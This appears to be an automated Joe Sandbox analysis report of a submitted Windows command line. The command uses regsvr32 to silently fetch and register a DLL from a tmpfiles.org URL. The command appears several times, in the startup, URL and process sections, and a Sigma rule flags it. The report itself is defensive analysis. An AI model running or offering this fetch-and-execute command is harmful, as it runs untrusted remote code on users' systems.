ID: 357160
Cookbook: defaultwindowscmdlinecookbook.jbs
Time: 08:59:48
Date: 24/02/2021
Version: 31.0.0 Emerald

Table of Contents
Table of Contents 2
Analysis Report 3
Overview 3
General Information 3
Detection 3
Signatures 3
Classification 3
Startup 3
Malware Configuration 3
Yara Overview 3
Sigma Overview 3
System Summary: 3
Signature Overview 3
System Summary: 4
Mitre Att&ck Matrix 4
Behavior Graph 4
Screenshots 5
Thumbnails 5
Antivirus, Machine Learning and Genetic Malware Detection 6
Initial Sample 6
Dropped Files 6
Unpacked PE Files 6
Domains 6
URLs 6
Domains and IPs 6
Contacted Domains 7
URLs from Memory and Binaries 7
Contacted IPs 7
General Information 7
Simulations 7
Behavior and APIs 8
Joe Sandbox View / Context 8
IPs 8
Domains 8
ASN 8
JA3 Fingerprints 8
Dropped Files 8
Created / dropped Files 8
Static File Info 8
No static file info 8
Network Behavior 8
Code Manipulations 8
Statistics 8
Behavior 8
System Behavior 9
Analysis Process: cmd.exe PID: 6988 Parent PID: 5036 9
General 9
File Activities 9
Analysis Process: conhost.exe PID: 7008 Parent PID: 6988 9
General 9
Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988 10
General 10
Disassembly 10
Code Analysis 10
Copyright null 2021 Page 2 of 10
Analysis Report
Overview
General Information
Analysis ID: 357160
Most interesting Screenshot:

Detection
Score: 22
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures
• Sigma detected: Regsvr32 Anomaly
• Creates a process in suspended mode…
• Program does not show much activity…
• Registers a DLL
• Tries to load missing DLLs

Classification
Categories: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware
Legend: malicious, suspicious, clean
Startup
System is w10x64
• cmd.exe (PID: 6988, cmdline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll', MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • conhost.exe (PID: 7008, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 7056, cmdline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll, MD5: 426E7499F6A7346F0410DEAD0805586B)
• cleanup
Malware Configuration
No configs have been found
Yara Overview
No yara matches
Sigma Overview
System Summary:
Sigma detected: Regsvr32 Anomaly
Signature Overview
• Networking
• System Summary
• Data Obfuscation
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
System Summary:
Mitre Att&ck Matrix
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Windows Management Instrumentation | DLL Side-Loading 1 | Process Injection 1 1 | Regsvr32 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Process Injection 1 1 | LSASS Memory | System Information Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading 1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph
Graph header: ID: 357160; Cookbook: defaultwindowscmdlinecookbook.jbs; Startdate: 24/02/2021; Architecture: WINDOWS; Score: 22
Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet
Graph: cmd.exe started conhost.exe and regsvr32.exe; signature shown in the graph: Sigma detected: Regsvr32 Anomaly
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
No Antivirus matches
Domains and IPs
Contacted Domains
No contacted domains info
URLs from Memory and Binaries
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://tmpfiles.org/dl/161971/k.dllWinsta0 | regsvr32.exe, 00000002.00000002.325527375.00000000027F0000.00000004.00000020.sdmp | false | | unknown |
| https://tmpfiles.org/dl/161971/k.dll | regsvr32.exe, 00000002.00000002.325634312.0000000002AB0000.00000004.00000040.sdmp | true | | unknown |
| https://tmpfiles.org/dl/161971/k.dllregsvr32 | regsvr32.exe, 00000002.00000002.325527375.00000000027F0000.00000004.00000020.sdmp | false | | unknown |
Contacted IPs
No contacted IP infos
General Information
Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 357160
Start date: 24.02.2021
Start time: 08:59:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 53s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled; EGA enabled; HDC enabled; AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: SUS
Classification: sus22.win@4/0@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Stop behavior analysis, all processes terminated
Warnings: Exclude process from analysis (whitelisted): svchost.exe
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
No context
Domains
No context
ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
No created / dropped files found
Static File Info
No static file info
Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior
• cmd.exe
• conhost.exe
• regsvr32.exe
System Behavior
Analysis Process: cmd.exe PID: 6988 Parent PID: 5036
General
Start time: 09:00:35
Start date: 24/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /C 'regsvr32 -s https://tmpfiles.org/dl/161971/k.dll'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Activities
Source File Path Access Attributes Options Completion Count Address Symbol
Analysis Process: conhost.exe PID: 7008 Parent PID: 6988
General
Start time: 09:00:36
Start date: 24/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Analysis Process: regsvr32.exe PID: 7056 Parent PID: 6988
General
Start time: 09:00:36
Start date: 24/02/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 -s https://tmpfiles.org/dl/161971/k.dll
Imagebase: 0x100000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Disassembly
Code Analysis